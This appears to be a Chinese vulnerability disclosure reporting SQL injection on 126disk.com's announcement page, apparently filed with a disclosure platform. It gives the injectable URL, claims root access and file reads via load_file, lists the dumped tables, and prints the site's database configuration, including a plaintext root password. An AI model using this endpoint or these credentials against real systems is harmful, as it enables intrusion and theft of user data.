126网盘注入

作者：  我了个去

简要描述：
公告处的一个猪肉，大家都懂得
详细说明：
php?id=4">http://www.126disk.com/gonggao.php?id=4
root权限，400disk库也可查看，也可以load file读任意文件,比如数据库配置文件
http://www.126disk.com/gonggao.php?id=-4 可以爆路径的 其实用google site 一下就可以发现很多warning ,不知有多少人在脱了吧？
漏洞证明：
inject: www.hack1990.com
Database: 126disk
[24 tables]
+------------------+
| disk_admin |
| disk_adminlog |
| disk_adminmsg |
| disk_collection |
| disk_count |
| disk_file |
| disk_gonggao |
| disk_guolv |
| disk_haoyou |
| disk_integral |
| disk_integrallog |
| disk_jubao |
| disk_link |
| disk_links |
| disk_message |
| disk_mulu |
| disk_search |
| disk_server |
| disk_tag |
| disk_type |
| disk_user |
| disk_userlog |
| disk_visitors |
| disk_zhuanji |
+------------------+

400disk跟126disk库结构基本一样吧，貌似就用户数量不一样

load file: class.php
$mysql_host = "localhost";
$mysql_user = "root";// 连接数据库用户名
$mysql_pass = "mysql.123!@#~";//连接数据库密码
$mysql_data = "126disk";// 数据库的名字
$mysql_charset = "gbk";